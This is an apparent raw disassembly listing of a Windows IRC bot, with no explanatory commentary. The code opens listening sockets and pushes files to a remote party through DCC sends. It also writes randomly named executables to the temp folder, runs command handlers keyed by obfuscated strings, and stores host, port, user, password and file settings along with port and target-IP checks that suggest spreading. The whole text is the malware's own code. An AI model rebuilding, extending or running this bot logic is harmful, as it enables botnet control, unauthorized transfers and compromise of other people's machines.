loc_40FC04: ; CODE XREF: sub_40A938+534E�j
lea eax, [ebp+var_21B8]
push eax
push [ebp+arg_10]
call sub_41CD84
loc_40FC13: ; CODE XREF: sub_40A938+68FA�j
add esp, 18h
jmp loc_412F27
; ---------------------------------------------------------------------------
loc_40FC1B: ; CODE XREF: sub_40A938+52B4�j
push 10h
lea eax, [ebp+var_90]
push edi
push eax
call sub_429690
mov esi, 400h
push 0FA00h
push esi
mov [ebp+var_90], 2
call sub_41E34F
add esp, 14h
push eax
call dword_4372C0 ; ntohs
mov word ptr [ebp+var_8E], ax
lea eax, [ebp+var_90]
push 10h
push eax
push [ebp+arg_C]
mov [ebp+var_8E+2], edi
call dword_437294 ; bind
test eax, eax
jz short loc_40FC8B
call dword_43716C ; RtlGetLastWin32Error
push eax
push offset aVv3aj1ywfkc_xz ; "VV3AJ1ywFkC.XzinP/s/R0A."
push offset aRccsh_adukf1 ; "RcCSh.AdUKf1"
push offset aSBindSD ; "%s Bind %s <%d>"
jmp loc_40FC04
; ---------------------------------------------------------------------------
loc_40FC8B: ; CODE XREF: sub_40A938+5336�j
push 10h
pop eax
mov [ebp+var_70], eax
mov [ebp+var_50], eax
lea eax, [ebp+var_50]
push eax
lea eax, [ebp+var_90]
push eax
push [ebp+arg_C]
call dword_437298 ; getsockname
push 1
push [ebp+arg_C]
call dword_43729C ; listen
cmp eax, 0FFFFFFFFh
jz loc_40FBEE
push offset dword_457CD8
call dword_4372A0 ; gethostbyname
movsx ecx, word ptr [eax+0Ah]
mov eax, [eax+0Ch]
push ecx
push dword ptr [eax]
lea eax, [ebp+var_44]
push eax
call sub_429350
lea eax, [ebp+var_2124]
push eax
lea eax, [ebp+var_2020]
push offset aSendingYouS ; "Sending you %s"
push eax
push [ebp+arg_10]
call sub_41CD0E
lea eax, [ebp+var_2124]
push offset dword_457CD8
push eax
lea eax, [ebp+var_2020]
push offset aDccSendSS ; "DCC Send %s (%s)"
push eax
push [ebp+arg_10]
call sub_41CD0E
add esp, 30h
push ebx
push [ebp+var_8E]
call dword_4372A4 ; ntohs
movzx eax, ax
push eax
push [ebp+var_44]
call dword_4372EC ; ntohl
push eax
lea eax, [ebp+var_2124]
push eax
lea eax, [ebp+var_2020]
push offset aSDDI ; "%s %d %d %i"
push eax
push [ebp+arg_10]
call sub_41CDFA
mov eax, [ebp+arg_C]
add esp, 1Ch
mov [ebp+var_5BBC], eax
lea eax, [ebp+var_98]
push eax
push edi
lea eax, [ebp+var_5BC0]
push edi
push eax
push edi
mov [ebp+var_98], 2Dh
mov [ebp+var_94], edi
mov [ebp+var_5BC0], 1
call dword_4372AC ; select
test eax, eax
jg short loc_40FDC7
push offset aRccsh_adukf1 ; "RcCSh.AdUKf1"
lea eax, [ebp+var_21B8]
push offset aSTimedOutClosi ; "%s Timed Out, closing connection."
push eax
push [ebp+arg_10]
call sub_41CD84
add esp, 10h
push [ebp+arg_68]
call dword_437044 ; CloseHandle
push [ebp+arg_C]
mov esi, dword_4372D4
call esi ; dword_4372D4
push edi
call esi ; dword_4372D4
jmp loc_412F27
; ---------------------------------------------------------------------------
loc_40FDC7: ; CODE XREF: sub_40A938+5455�j
lea eax, [ebp+var_70]
push eax
lea eax, [ebp+var_CF4]
push eax
push [ebp+arg_C]
call dword_4372B0 ; accept
cmp eax, 0FFFFFFFFh
mov [ebp+var_4], eax
jz loc_40FE85
push [ebp+arg_C]
call dword_4372D4 ; closesocket
mov [ebp+arg_4], ebx
loc_40FDF3: ; CODE XREF: sub_40A938+5547�j
push esi
lea eax, [ebp+var_7180]
push edi
push eax
mov [ebp+arg_64], esi
call sub_429690
add esp, 0Ch
cmp [ebp+arg_4], esi
jnb short loc_40FE12
mov eax, [ebp+arg_4]
mov [ebp+arg_64], eax
loc_40FE12: ; CODE XREF: sub_40A938+54D2�j
push edi
push edi
push [ebp+arg_8]
push [ebp+arg_68]
call dword_4370AC ; SetFilePointer
lea eax, [ebp+var_48]
push edi
push eax
lea eax, [ebp+var_7180]
push [ebp+arg_64]
push eax
push [ebp+arg_68]
call dword_437084 ; ReadFile
push edi
lea eax, [ebp+var_7180]
push [ebp+arg_64]
push eax
push [ebp+var_4]
call dword_4372CC ; send
mov [ebp+arg_64], eax
push edi
lea eax, [ebp+var_7180]
push esi
push eax
push [ebp+var_4]
call dword_4372D0 ; recv
mov ecx, [ebp+arg_8]
mov [ebp+arg_4], ebx
add ecx, [ebp+arg_64]
sub [ebp+arg_4], ecx
mov [ebp+arg_8], ecx
cmp [ebp+arg_4], 1
jb short loc_40FE85
cmp [ebp+arg_64], 1
jb short loc_40FE85
cmp eax, 1
jnb loc_40FDF3
loc_40FE85: ; CODE XREF: sub_40A938+54A9�j
; sub_40A938+553C�j ...
mov eax, [ebp+arg_8]
cdq
idiv esi
shr ebx, 0Ah
push ebx
push eax
push offset aRccsh_adukf1 ; "RcCSh.AdUKf1"
lea eax, [ebp+var_21B8]
push offset aSConnectionClo ; "%s Connection closed: (%i/%ikB sent)."
push eax
push [ebp+arg_10]
call sub_41CD84
add esp, 18h
push [ebp+arg_68]
call dword_437044 ; CloseHandle
push [ebp+arg_C]
mov esi, dword_4372D4
call esi ; dword_4372D4
push [ebp+var_4]
call esi ; dword_4372D4
jmp loc_4148CF
; ---------------------------------------------------------------------------
loc_40FECA: ; CODE XREF: sub_40A938+51AC�j
push dword ptr [ebx]
push offset aUfbss0cbo8c__0 ; "uFbSS0Cbo8C."
call edi ; dword_437174
test eax, eax
jnz loc_4100C3
cmp [ebx+4], eax
jz loc_4100B9
cmp [ebx+8], eax
jz loc_4100B9
push 11h
call sub_423756
test eax, eax
pop ecx
mov [ebp+arg_C], eax
jle short loc_40FF40
cmp [ebp+arg_14], 0
mov ebx, offset aJqrlpUxr08Qqdu ; "JQrlp/UXr08/qqduw/ZeDHN/N/Wda.tYScO0znN"...
mov edi, offset aSSD_ ; "%s %s (%d)."
jnz short loc_40FF28
cmp [ebp+arg_18], 0
jnz short loc_40FF32
push eax
push ebx
push offset aHuudgYqzdz ; "HuuDG/YQZDz/"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 18h
loc_40FF28: ; CODE XREF: sub_40A938+55D2�j
cmp [ebp+arg_18], 0
jz loc_4148CF
loc_40FF32: ; CODE XREF: sub_40A938+55D8�j
push [ebp+arg_C]
push ebx
loc_40FF36: ; CODE XREF: sub_40A938+5715�j
push offset aHuudgYqzdz ; "HuuDG/YQZDz/"
jmp loc_414856
; ---------------------------------------------------------------------------
loc_40FF40: ; CODE XREF: sub_40A938+55C2�j
mov eax, [ebp+arg_10]
mov ecx, [ebp+arg_20]
mov [ebp+var_728], eax
mov eax, [ebp+arg_14]
mov [ebp+var_674], eax
mov eax, [ebp+arg_18]
mov [ebp+var_670], eax
mov [ebp+var_678], ecx
test eax, eax
lea eax, [ebp+var_724]
jnz short loc_40FF73
push dword ptr [esi+0Ch]
jmp short loc_40FF75
; ---------------------------------------------------------------------------
loc_40FF73: ; CODE XREF: sub_40A938+5634�j
push dword ptr [esi]
loc_40FF75: ; CODE XREF: sub_40A938+5639�j
push eax
call dword_4370A4 ; lstrcpyA
mov eax, [ebx+4]
xor ecx, ecx
mov [ebp+var_6A0], eax
mov eax, [ebx+8]
mov [ebp+var_69C], eax
xor eax, eax
mov [ebp+var_694], eax
cmp [ebx+0Ch], eax
mov edi, offset aHuudgYqzdz ; "HuuDG/YQZDz/"
setnz cl
mov [ebp+var_690], ecx
xor ecx, ecx
cmp [ebx+10h], eax
setnz cl
mov [ebp+var_68C], ecx
push dword ptr [ebx+8]
mov eax, [ebx+4]
push eax
push offset aRy6iq0udbphLlD ; "RY6IQ0UDbPh/LL/Dw.r3B9K/"
push edi
push offset aSSS_ ; "%s %s %s."
push 11h
call sub_4233DE
add esp, 18h
mov [ebp+var_6A4], eax
lea eax, [ebp+arg_0]
lea ecx, [ebp+var_728]
push eax
xor eax, eax
push eax
push ecx
push offset sub_4181F4
push eax
push eax
call dword_43717C ; CreateThread
mov ecx, [ebp+var_6A4]
imul ecx, 2724h
test eax, eax
mov dword_46D70C[ecx], eax
jnz short loc_41005A
cmp [ebp+arg_14], eax
mov ebx, dword_43716C
mov edi, offset aSSD_ ; "%s %s (%d)."
jnz short loc_41003B
cmp [ebp+arg_18], eax
jnz short loc_410045
call ebx ; dword_43716C
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
push offset aHuudgYqzdz ; "HuuDG/YQZDz/"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 18h
loc_41003B: ; CODE XREF: sub_40A938+56E0�j
cmp [ebp+arg_18], 0
jz loc_4148CF
loc_410045: ; CODE XREF: sub_40A938+56E5�j
call ebx ; dword_43716C
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
jmp loc_40FF36
; ---------------------------------------------------------------------------
loc_410052: ; CODE XREF: sub_40A938+5729�j
push 32h
call dword_43718C ; Sleep
loc_41005A: ; CODE XREF: sub_40A938+56D0�j
; DATA XREF: .text:off_43BCBC�o
cmp [ebp+var_66C], 0
jz short loc_410052
xor eax, eax
cmp [ebp+arg_14], eax
jnz short loc_410098
cmp [ebp+arg_18], eax
jnz short loc_4100A2
cmp [ebp+arg_20], eax
jz loc_4148CF
push dword ptr [ebx+8]
mov eax, [ebx+4]
push eax
push offset aRy6iq0udbphLlD ; "RY6IQ0UDbPh/LL/Dw.r3B9K/"
push edi
push offset aSSS_ ; "%s %s %s."
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 1Ch
loc_410098: ; CODE XREF: sub_40A938+5730�j
cmp [ebp+arg_18], 0
jz loc_4148CF
loc_4100A2: ; CODE XREF: sub_40A938+5735�j
push dword ptr [ebx+8]
mov eax, [ebx+4]
push eax
push offset aRy6iq0udbphLlD ; "RY6IQ0UDbPh/LL/Dw.r3B9K/"
push edi
push offset aSSS_ ; "%s %s %s."
jmp loc_4148C2
; ---------------------------------------------------------------------------
loc_4100B9: ; CODE XREF: sub_40A938+55A6�j
; sub_40A938+55AF�j
mov edi, offset aHuudgYqzdz ; "HuuDG/YQZDz/"
jmp loc_40BE4A
; ---------------------------------------------------------------------------
loc_4100C3: ; CODE XREF: sub_40A938+559D�j
push dword ptr [ebx]
push offset aNoazx1alvg0 ; "NoaZx1Alvg/0"
call edi ; dword_437174
test eax, eax
jnz loc_410352
xor ecx, ecx
cmp [ebx+4], ecx
jnz short loc_4100F6
cmp [ebp+arg_14], ecx
mov edi, offset a6hwiyOatg9_6n5 ; "6HWiy/OAtg9.6N5aw.affEY1"
mov ebx, offset aFoabg1acvfoOsd ; "fOaBg1ACVfo/osdpb1E0v95."
jnz loc_40BE74
cmp [ebp+arg_18], ecx
jmp loc_40BE59
; ---------------------------------------------------------------------------
loc_4100F6: ; CODE XREF: sub_40A938+57A1�j
mov eax, [ebx+8]
cmp eax, ecx
jz short loc_41010D
push eax
push offset a3c9 ; "]&3c9"
call edi ; dword_437174
test eax, eax
jz loc_4148CF
loc_41010D: ; CODE XREF: sub_40A938+57C3�j
push 11h
call sub_423756
test eax, eax
pop ecx
mov [ebp+arg_C], eax
jle short loc_410160
cmp [ebp+arg_14], 0
mov ebx, offset aJqrlpUxr08Qqdu ; "JQrlp/UXr08/qqduw/ZeDHN/N/Wda.tYScO0znN"...
mov edi, offset aSSD_ ; "%s %s (%d)."
jnz short loc_410148
cmp [ebp+arg_18], 0
jnz short loc_410152
push eax
push ebx
push offset a6hwiyOatg9_6n5 ; "6HWiy/OAtg9.6N5aw.affEY1"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 18h
loc_410148: ; CODE XREF: sub_40A938+57F2�j
cmp [ebp+arg_18], 0
jz loc_4148CF
loc_410152: ; CODE XREF: sub_40A938+57F8�j
push [ebp+arg_C]
push ebx
loc_410156: ; CODE XREF: sub_40A938+59A8�j
push offset a6hwiyOatg9_6n5 ; "6HWiy/OAtg9.6N5aw.affEY1"
jmp loc_414856
; ---------------------------------------------------------------------------
loc_410160: ; CODE XREF: sub_40A938+57E2�j
lea eax, [ebp+var_6D80]
push eax
push 104h
call dword_4370A8 ; GetTempPathA
call sub_429ACC
push 9
pop edi
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, edi
idiv ecx
push edx
call sub_429ACC
cdq
idiv edi
lea eax, [ebp+var_6D80]
push edx
push offset dword_44399C
push eax
lea eax, [ebp+var_5DC4]
push offset aSSDDDDD_exe ; "%s%s%d%d%d%d%d.exe"
push eax
call sub_429A33
mov eax, [ebp+arg_10]
mov ecx, [ebp+arg_20]
mov [ebp+var_664], eax
mov eax, [ebp+arg_14]
mov [ebp+var_5B0], eax
mov eax, [ebp+arg_18]
add esp, 24h
mov [ebp+var_5AC], eax
test eax, eax
mov [ebp+var_5B4], ecx
lea eax, [ebp+var_660]
jnz short loc_4101FD
push dword ptr [esi+0Ch]
jmp short loc_4101FF
; ---------------------------------------------------------------------------
loc_4101FD: ; CODE XREF: sub_40A938+58BE�j
push dword ptr [esi]
loc_4101FF: ; CODE XREF: sub_40A938+58C3�j
push eax
call dword_4370A4 ; lstrcpyA
mov eax, [ebx+4]
xor ecx, ecx
mov [ebp+var_5DC], eax
lea eax, [ebp+var_5DC4]
mov [ebp+var_5D8], eax
xor eax, eax
cmp [ebx+0Ch], eax
mov [ebp+var_5D0], 1
mov [ebp+var_5CC], eax
mov [ebp+var_5C8], eax
setnz cl
mov [ebp+var_5C4], ecx
mov eax, [ebx+4]
lea ecx, [ebp+var_5DC4]
mov edi, offset aRy6iq0udbphN2n ; "RY6IQ0UDbPh/N2NHs/pc9zb/8Wb3v063Ds00"
push ecx
push eax
push edi
push offset a6hwiyOatg9_6n5 ; "6HWiy/OAtg9.6N5aw.affEY1"
push offset dword_441040
push 11h
call sub_4233DE
add esp, 18h
mov [ebp+var_5E0], eax
lea eax, [ebp+arg_0]
lea ecx, [ebp+var_664]
push eax
xor eax, eax
push eax
push ecx
push offset sub_4181F4
push eax
push eax
call dword_43717C ; CreateThread
mov ecx, [ebp+var_5E0]
imul ecx, 2724h
test eax, eax
mov dword_46D70C[ecx], eax
jnz short loc_4102ED
cmp [ebp+arg_14], eax
mov ebx, dword_43716C
mov edi, offset aSSD_ ; "%s %s (%d)."
jnz short loc_4102CE
cmp [ebp+arg_18], eax
jnz short loc_4102D8
call ebx ; dword_43716C
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
push offset a6hwiyOatg9_6n5 ; "6HWiy/OAtg9.6N5aw.affEY1"
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 18h
loc_4102CE: ; CODE XREF: sub_40A938+5973�j
cmp [ebp+arg_18], 0
jz loc_4148CF
loc_4102D8: ; CODE XREF: sub_40A938+5978�j
call ebx ; dword_43716C
push eax
push offset a4ezrg1ye5hp1au ; "4Ezrg1ye5hp1AUz6N/Zzkas/bbUvL0k.zqt1cpO"...
jmp loc_410156
; ---------------------------------------------------------------------------
loc_4102E5: ; CODE XREF: sub_40A938+59BC�j
push 32h
call dword_43718C ; Sleep
loc_4102ED: ; CODE XREF: sub_40A938+5963�j
cmp [ebp+var_5A8], 0
jz short loc_4102E5
xor eax, eax
cmp [ebp+arg_14], eax
jnz short loc_41032E
cmp [ebp+arg_18], eax
jnz short loc_410338
cmp [ebp+arg_20], eax
jz loc_4148CF
push [ebp+var_5D8]
mov eax, [ebx+4]
push eax
push edi
push offset a6hwiyOatg9_6n5 ; "6HWiy/OAtg9.6N5aw.affEY1"
push offset dword_441040
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 1Ch
loc_41032E: ; CODE XREF: sub_40A938+59C3�j
cmp [ebp+arg_18], 0
jz loc_4148CF
loc_410338: ; CODE XREF: sub_40A938+59C8�j
push [ebp+var_5D8]
mov ebx, [ebx+4]
push ebx
push edi
push offset a6hwiyOatg9_6n5 ; "6HWiy/OAtg9.6N5aw.affEY1"
push offset dword_441040
jmp loc_4148C2
; ---------------------------------------------------------------------------
loc_410352: ; CODE XREF: sub_40A938+5796�j
push dword ptr [ebx]
push offset aUqyil_iyvpi_ ; "uQYiL.iYvpI."
call edi ; dword_437174
test eax, eax
jnz loc_410547
cmp [ebx+4], eax
jz loc_41053D
cmp [ebx+8], eax
jz loc_41053D
mov edi, 200h
push edi
push eax
push offset dword_456580
call sub_429690
push edi
push 0
push offset dword_456788
call sub_429690
push edi
push 0
push offset dword_456988
call sub_429690
push edi
push 0
push offset dword_456B88
call sub_429690
mov edi, dword_4370A4
add esp, 30h
push dword ptr [ebx+4]
push offset dword_456580
call edi ; dword_4370A4
push dword ptr [ebx+8]
call sub_42A030
mov dword_456780, eax
mov eax, [ebx+0Ch]
test eax, eax
pop ecx
jz short loc_4103DD
push eax
push offset dword_456788
call edi ; dword_4370A4
loc_4103DD: ; CODE XREF: sub_40A938+5A9B�j
mov eax, [ebx+10h]
test eax, eax
jz short loc_4103EC
push eax
push offset dword_456988
call edi ; dword_4370A4
loc_4103EC: ; CODE XREF: sub_40A938+5AAA�j
mov ebx, [ebx+14h]
test ebx, ebx
jz short loc_4103FB
push ebx
push offset dword_456B88
call edi ; dword_4370A4
loc_4103FB: ; CODE XREF: sub_40A938+5AB9�j
cmp [ebp+arg_60], 0
jz loc_4104E9
call dword_437184 ; GetTickCount
push eax
call sub_429ABF
pop ecx
call sub_429ACC
push 1Ah
pop ebx
cdq
mov ecx, ebx
idiv ecx
add edx, 61h
push edx
call sub_429ACC
cdq
mov ecx, ebx
idiv ecx
add edx, 61h
push edx
call sub_429ACC
cdq
mov ecx, ebx
idiv ecx
add edx, 61h
push edx
call sub_429ACC
cdq
mov ecx, ebx
idiv ecx
add edx, 61h
push edx
call sub_429ACC
cdq
mov ecx, ebx
idiv ecx
add edx, 61h
push edx
call sub_429ACC
cdq
idiv ebx
mov ebx, offset dword_4561F8
add edx, 61h
push edx
push offset aCCCCCC ; "%c%c%c%c%c%c"
push ebx
call sub_429A33
add esp, 20h
push ebx
push offset dword_456788
call edi ; dword_4370A4
push ebx
push offset dword_456988
call edi ; dword_4370A4
call sub_429ACC
push 9
pop ebx
cdq
mov ecx, ebx
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, ebx
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, ebx
idiv ecx
push edx
call sub_429ACC
cdq
mov ecx, ebx
idiv ecx
push edx
call sub_429ACC
cdq
idiv ebx
lea eax, [ebp+var_61CC]
push edx
push offset dword_44399C
push offset aSDDDDD_exe ; "%s%d%d%d%d%d.exe"
push eax
call sub_429A33
add esp, 20h
lea eax, [ebp+var_61CC]
push eax
push offset dword_456B88
call edi ; dword_4370A4
loc_4104E9: ; CODE XREF: sub_40A938+5AC7�j
cmp [ebp+arg_14], 0
mov dword_456D88, 1
mov edi, offset aC4dd9_nojvo1 ; "C4dD9.nojvO1"
mov ebx, offset aSIsSetToSDUSPS ; "%s is set to %s:%d U: %s P: %s F: %s"
jnz short loc_410537
cmp [ebp+arg_18], 0
jnz loc_4105A9
push offset dword_456B88
push offset dword_456988
push offset dword_456788
push dword_456780
push offset dword_456580
push edi
push ebx
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 24h
loc_410537: ; CODE XREF: sub_40A938+5BC9�j
cmp [ebp+arg_18], 0
jmp short loc_4105A3
; ---------------------------------------------------------------------------
loc_41053D: ; CODE XREF: sub_40A938+5A2E�j
; sub_40A938+5A37�j
mov edi, offset aC4dd9_nojvo1 ; "C4dD9.nojvO1"
jmp loc_40BE4A
; ---------------------------------------------------------------------------
loc_410547: ; CODE XREF: sub_40A938+5A25�j
push dword ptr [ebx]
push offset a4qyyh1q2ps1 ; "4QyYH1q/2ps1"
call edi ; dword_437174
test eax, eax
jnz loc_410608
cmp dword_456D88, eax
mov edi, offset aC4dd9_nojvo1 ; "C4dD9.nojvO1"
jz short loc_4105D7
cmp [ebp+arg_14], eax
mov ebx, offset aSIsSetToSDUSPS ; "%s is set to %s:%d U: %s P: %s F: %s"
jnz short loc_4105A0
cmp [ebp+arg_18], eax
jnz short loc_4105A9
push offset dword_456B88
push offset dword_456988
push offset dword_456788
push dword_456780
push offset dword_456580
push edi
push ebx
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 24h
xor eax, eax
loc_4105A0: ; CODE XREF: sub_40A938+5C35�j
cmp [ebp+arg_18], eax
loc_4105A3: ; CODE XREF: sub_40A938+5C03�j
jz loc_412F27
loc_4105A9: ; CODE XREF: sub_40A938+5BCF�j
; sub_40A938+5C3A�j
push offset dword_456B88
push offset dword_456988
push offset dword_456788
push dword_456780
push offset dword_456580
push edi
push ebx
push dword ptr [esi]
push [ebp+arg_10]
call sub_41CD0E
add esp, 24h
jmp loc_412F27
; ---------------------------------------------------------------------------
loc_4105D7: ; CODE XREF: sub_40A938+5C2B�j
cmp [ebp+arg_14], eax
mov ebx, offset aSIsOff_ ; "%s is off."
jnz short loc_4105F8
cmp [ebp+arg_18], eax
jnz short loc_410601
push edi
push ebx
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 10h
xor eax, eax
loc_4105F8: ; CODE XREF: sub_40A938+5CA7�j
cmp [ebp+arg_18], eax
loc_4105FB: ; CODE XREF: sub_40A938+5D9F�j
jz loc_412F27
loc_410601: ; CODE XREF: sub_40A938+5CAC�j
; sub_40A938:loc_4106BD�j
push edi
push ebx
jmp loc_40B99A
; ---------------------------------------------------------------------------
loc_410608: ; CODE XREF: sub_40A938+5C1A�j
push dword ptr [ebx]
push offset aZgidu12tiv0 ; "ZGidU12tiV0/"
call edi ; dword_437174
test eax, eax
jnz short loc_41063C
cmp dword_456D88, eax
jz loc_412F27
mov ebx, offset aSIsOn_ ; "%s is on."
loc_410626: ; CODE XREF: sub_40A938+5D22�j
cmp [ebp+arg_14], eax
mov edi, offset aC4dd9_nojvo1 ; "C4dD9.nojvO1"
jnz loc_4106D3
cmp [ebp+arg_18], eax
jmp loc_4106BD
; ---------------------------------------------------------------------------
loc_41063C: ; CODE XREF: sub_40A938+5CDB�j
push dword ptr [ebx]
push offset aHgcrw_cwuf5_ ; "HGCRW.CWUF5."
call edi ; dword_437174
test eax, eax
jnz short loc_41065C
cmp dword_456D88, eax
jnz loc_412F27
mov ebx, offset aSIsOff_ ; "%s is off."
jmp short loc_410626
; ---------------------------------------------------------------------------
loc_41065C: ; CODE XREF: sub_40A938+5D0F�j
push dword ptr [ebx]
push offset aGztle_nhywf ; "gzTlE.nhywf/"
call edi ; dword_437174
test eax, eax
jnz short loc_4106DC
mov edi, 200h
xor ebx, ebx
push edi
push ebx
push offset dword_456580
mov dword_456D88, ebx
call sub_429690
push edi
push ebx
push offset dword_456788
call sub_429690
push edi
push ebx
push offset dword_456988
call sub_429690
push edi
push ebx
push offset dword_456B88
call sub_429690
add esp, 30h
cmp [ebp+arg_14], 0
mov edi, offset aC4dd9_nojvo1 ; "C4dD9.nojvO1"
mov ebx, offset aSIsOff_ ; "%s is off."
jnz short loc_4106D3
cmp [ebp+arg_18], 0
loc_4106BD: ; CODE XREF: sub_40A938+5CFF�j
jnz loc_410601
push edi
push ebx
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 10h
loc_4106D3: ; CODE XREF: sub_40A938+5CF6�j
; sub_40A938+5D7F�j
cmp [ebp+arg_18], 0
jmp loc_4105FB
; ---------------------------------------------------------------------------
loc_4106DC: ; CODE XREF: sub_40A938+5D2F�j
push dword ptr [ebx]
push offset aL80reUvcue1 ; "l80re/UvCUe1"
call edi ; dword_437174
test eax, eax
jnz short loc_410730
cmp [ebp+arg_18], eax
mov ebx, [ebx+4]
jnz short loc_41070B
test ebx, ebx
jz short loc_4106FE
push ebx
call sub_42A030
pop ecx
jmp short loc_410700
; ---------------------------------------------------------------------------
loc_4106FE: ; CODE XREF: sub_40A938+5DBB�j
xor eax, eax
loc_410700: ; CODE XREF: sub_40A938+5DC4�j
push eax
push [ebp+arg_20]
push 0
push dword ptr [esi+0Ch]
jmp short loc_410723
; ---------------------------------------------------------------------------
loc_41070B: ; CODE XREF: sub_40A938+5DB7�j
test ebx, ebx
jz short loc_410718
push ebx
call sub_42A030
pop ecx
jmp short loc_41071A
; ---------------------------------------------------------------------------
loc_410718: ; CODE XREF: sub_40A938+5DD5�j
xor eax, eax
loc_41071A: ; CODE XREF: sub_40A938+5DDE�j
push eax
push [ebp+arg_20]
push [ebp+arg_18]
push dword ptr [esi]
loc_410723: ; CODE XREF: sub_40A938+5DD1�j
push [ebp+arg_10]
call sub_401990
jmp loc_4146D5
; ---------------------------------------------------------------------------
loc_410730: ; CODE XREF: sub_40A938+5DAF�j
push dword ptr [ebx]
push offset aTvjro1ubgtg1 ; "TVJrO1uBGtg1"
call edi ; dword_437174
test eax, eax
jnz short loc_41077C
mov ebx, [ebx+4]
test ebx, ebx
jz short loc_41074C
push ebx
call sub_42A030
jmp short loc_410753
; ---------------------------------------------------------------------------
loc_41074C: ; CODE XREF: sub_40A938+5E0A�j
push 8
call sub_423756
loc_410753: ; CODE XREF: sub_40A938+5E12�j
test eax, eax
pop ecx
jz loc_4148CF
cmp [ebp+arg_18], 0
push eax
jnz short loc_41076A
push 0
push dword ptr [esi+0Ch]
jmp short loc_41076F
; ---------------------------------------------------------------------------
loc_41076A: ; CODE XREF: sub_40A938+5E29�j
push [ebp+arg_18]
push dword ptr [esi]
loc_41076F: ; CODE XREF: sub_40A938+5E30�j
push [ebp+arg_10]
call sub_40203B
jmp loc_414688
; ---------------------------------------------------------------------------
loc_41077C: ; CODE XREF: sub_40A938+5E03�j
push dword ptr [ebx]
push offset aVxa_uCdd7s0 ; "VXA.u/cDD7S0"
call edi ; dword_437174
test eax, eax
jnz short loc_410795
push offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
push 8
jmp loc_412A63
; ---------------------------------------------------------------------------
loc_410795: ; CODE XREF: sub_40A938+5E4F�j
push dword ptr [ebx]
push offset aH1cmq0wqw5c_ ; "h1cMQ0wQw5C."
call edi ; dword_437174
test eax, eax
jnz loc_410D62
cmp [ebx+4], eax
jz loc_414690
cmp [ebx+8], eax
jz loc_414690
cmp [ebx+0Ch], eax
jz loc_414690
cmp [ebx+10h], eax
jz loc_414690
push 8
call sub_423737
push dword ptr [ebx+8]
mov [ebp+arg_C], eax
call sub_42A030
add eax, [ebp+arg_C]
pop ecx
pop ecx
cmp eax, 1C2h
jg loc_413E17
push dword ptr [ebx+4]
call sub_42A030
movzx eax, ax
mov [ebp+var_244], eax
push dword ptr [ebx+8]
call sub_42A030
mov [ebp+var_22C], eax
push dword ptr [ebx+0Ch]
call sub_42A030
add esp, 0Ch
cmp eax, 1
mov [ebp+var_240], eax
jnb short loc_41082A
xor eax, eax
inc eax
mov [ebp+var_240], eax
loc_41082A: ; CODE XREF: sub_40A938+5EE7�j
push 3
pop ecx
cmp eax, ecx
jbe short loc_410837
mov [ebp+var_240], ecx
loc_410837: ; CODE XREF: sub_40A938+5EF7�j
push dword ptr [ebx+10h]
call sub_42A030
mov [ebp+var_23C], eax
mov eax, 270Fh
cmp [ebp+var_23C], eax
pop ecx
jbe short loc_410859
mov [ebp+var_23C], eax
loc_410859: ; CODE XREF: sub_40A938+5F19�j
mov eax, [ebp+arg_14]
or [ebp+var_228], 0FFFFFFFFh
mov dword_454A28, eax
mov eax, [ebp+arg_20]
mov dword_454A2C, eax
mov eax, [ebp+arg_18]
xor ecx, ecx
mov dword_454A30, eax
cmp dword_43A378, ecx
mov [ebp+arg_C], ecx
jz short loc_4108C9
mov [ebp+arg_4], offset dword_43A378
loc_41088C: ; CODE XREF: sub_40A938+5F71�j
mov eax, [ebp+arg_4]
push dword ptr [ebx+4]
add eax, 0FFFFFFD0h
push eax
call edi ; dword_437174
test eax, eax
jz short loc_4108AD
add [ebp+arg_4], 40h
inc [ebp+arg_C]
mov eax, [ebp+arg_4]
cmp dword ptr [eax], 0
jnz short loc_41088C
jmp short loc_4108C7
; ---------------------------------------------------------------------------
loc_4108AD: ; CODE XREF: sub_40A938+5F62�j
mov eax, [ebp+arg_C]
mov ecx, eax
mov [ebp+var_228], eax
shl ecx, 6
mov ecx, dword_43A378[ecx]
mov [ebp+var_244], ecx
loc_4108C7: ; CODE XREF: sub_40A938+5F73�j
xor ecx, ecx
loc_4108C9: ; CODE XREF: sub_40A938+5F4B�j
cmp [ebp+var_244], ecx
jnz short loc_410902
cmp [ebp+arg_14], ecx
mov edi, offset aSInvalidPort ; "%s Invalid port"
jnz short loc_4108FA
cmp [ebp+arg_18], ecx
jnz loc_414678
push offset aMflx2_qu4vy_ ; "mflX2.QU4VY."
push edi
push dword ptr [esi+0Ch]
push [ebp+arg_10]
call sub_41CD84
add esp, 10h
xor ecx, ecx
loc_4108FA: ; CODE XREF: sub_40A938+5FA1�j
cmp [ebp+arg_18], ecx
jmp loc_414672
; ---------------------------------------------------------------------------
loc_410902: ; CODE XREF: sub_40A938+5F97�j
mov eax, [ebx+14h]
cmp eax, ecx
jz loc_410990
push eax
push offset aX_x_x_x ; "x.x.x.x"
call edi ; dword_437174
test eax, eax
jnz short loc_410961
call dword_437184 ; GetTickCount
push eax
call sub_429ABF
pop ecx
